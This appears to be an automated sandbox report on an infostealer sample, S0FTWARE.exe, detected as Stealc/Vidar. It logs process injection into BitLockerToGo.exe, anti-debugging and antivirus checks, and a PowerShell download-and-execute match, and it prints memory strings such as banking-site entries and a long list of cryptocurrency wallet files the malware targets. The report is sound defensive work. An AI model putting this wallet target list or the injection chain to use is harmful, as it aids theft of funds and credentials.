                          Source: Web Data.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                          Source: Web Data.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-72773
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-72788
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-73906
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FE88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_008FE88C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FA132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_008FA132
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E149D mov eax, dword ptr fs:[00000030h]3_2_008E149D
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E1492 mov eax, dword ptr fs:[00000030h]3_2_008E1492
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E147A mov eax, dword ptr fs:[00000030h]3_2_008E147A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F9D79 mov eax, dword ptr fs:[00000030h]3_2_008F9D79
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F9D78 mov eax, dword ptr fs:[00000030h]3_2_008F9D78
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F28AF GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_008F28AF
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FE88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_008FE88C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FF20C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_008FF20C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00908EAE SetUnhandledExceptionFilter,3_2_00908EAE
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C9AB66C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C9AB1F7
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CB5AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CB5AC62

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Allocates memory in foreign processes
                          Source: C:\Users\user\Desktop\S0FTWARE.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8E0000 protect: page execute and read and writeJump to behavior
                          Contains functionality to inject code into remote processes
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F12EC _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,3_2_008F12EC
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8E0000 value starts with: 4D5AJump to behavior
                          Searches for specific processes (likely to inject)
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F42EE __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_008F42EE
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F4452 CreateToolhelp32Snapshot,Process32First,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_008F4452
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F43C5 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_008F43C5
                          Writes to foreign memory regions
                          Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 77E008Jump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8E0000Jump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8E1000Jump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 911000Jump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 91E000Jump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: B33000Jump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: B34000Jump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E118E cpuid 3_2_008E118E
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_008F2A37
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0090C94C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_0090B2D0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_0090CAE8
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0090CA41
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0090C3C0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0090CB43
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_00906C63
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: EnumSystemLocalesA,3_2_0090CDD6
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00908DF6
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_0090B5EE
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_0090FDEF
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0090CD14
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_00908D1C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0090CEA3
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0090CE00
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_0090A644
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0090CE67
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoA,3_2_0090FF24
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\S0FTWARE.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F38A6 GetSystemTime,3_2_008F38A6
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F28AF GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_008F28AF
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F298A GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,3_2_008F298A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.0000000003159000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Stealc
                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.91ecc0.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*.**2
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia 